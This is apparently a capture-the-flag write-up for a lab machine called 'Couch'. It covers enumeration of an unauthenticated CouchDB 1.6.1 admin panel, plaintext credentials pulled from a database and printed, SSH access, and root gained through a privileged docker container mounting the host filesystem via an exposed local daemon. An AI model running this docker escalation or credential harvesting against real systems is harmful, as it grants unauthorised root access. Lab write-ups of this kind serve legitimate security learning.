# Couch
## Tasks
* Determine open ports.
* Determine DBMS and port.
* Version of DBMS
* Path of web administration tool.
* Path for list of all DBs
* Credentials
* user.txt
* root.txt

## Vulnerabilities
* Admin page with no authentication
* Credentials not hashed in database
* Mounting / including /root as a docker container.


## RUSTSCAN
```nmap
PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
5984/tcp open  couchdb syn-ack

```
I felt Nmap is slow so I used rustscan. Now we can determine the DBMS and port.
Now we can just feed the port to Nmap to check for the version.
```nmap
PORT     STATE SERVICE VERSION
5984/tcp open  http    CouchDB httpd 1.6.1 (Erlang OTP/18)
|_http-server-header: CouchDB/1.6.1 (Erlang OTP/18)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
```
Let's check out that server.
```json
{"couchdb":"Welcome","uuid":"ef680bb740692240059420b2c17db8f3","version":"1.6.1","vendor":{"version":"16.04","name":"Ubuntu"}}
```
Let's enumerate it some more

## GOBUSTER
```txt
/_shared              (Status: 400) [Size: 198]   
/_utils               (Status: 301) [Size: 0] [--> http://10.10.166.182:5984/_utils/]
/_sharedtemplates     (Status: 400) [Size: 207]                                      
/_shop                (Status: 400) [Size: 196]                                      
/_siteadmin           (Status: 400) [Size: 201]     

```
They were a lot of results, but there was only one with 301, which is a redirect.
Opening up we're at some page, looking at the bottom left.
```txt
Welcome to Admin Party!  
Everyone is admin.
```
Sweet.
Now let's check the Configuration page to find out where all the databases are set.
```txt
_all_dbs:`{couch_httpd_misc_handlers, handle_all_dbs_req}`
```
Next let's check out that 'secret' database.
And sure enough there is credentials in it.
```txt
atena:t4qfzcc4qN##
```
Now we can try to SSH in.
User.txt should be in the home folder usually.
```txt
atena@ubuntu:~$ cat user.txt 
```
Let's see if we can run sudo or not.
```txt
atena@ubuntu:~$ sudo -l
[sudo] password for atena: 
Sorry, user atena may not run sudo on ubuntu.
```
Apparently not. After looking around, I looked back at linpeas, something else was running too.
```txt
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:42811         0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:5984            0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:2375          0.0.0.0:*               LISTEN  
```
And there is docker installed in this so perhaps docker containers? Let's check .bash_history to find out.
```txt
docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
uname -a
exit

```
So there is a container running on port 2375.
Let's run that command. Now we're in the container as root. Checking out /root the flag isn't there since we mounted / at /mnt. Let's go there and get our root flag.